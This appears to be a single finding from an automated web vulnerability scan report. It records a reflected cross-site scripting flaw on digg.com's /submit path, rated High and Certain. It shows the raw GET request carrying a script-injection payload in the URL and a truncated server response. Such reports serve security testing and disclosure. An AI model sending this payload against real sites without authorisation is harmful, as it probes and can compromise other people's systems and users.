1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /submit |
GET /submit%0033160"><script>alert(1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 15:02:25 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 Cache-Control: no-cache,no-store,must Pragma: no-cache Set-Cookie: traffic_control Set-Cookie: d=6efe0db81bc15ced32 X-Digg-Time: D=318579 10.2.129.48 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 15210 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Digg - error_ - Profile</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |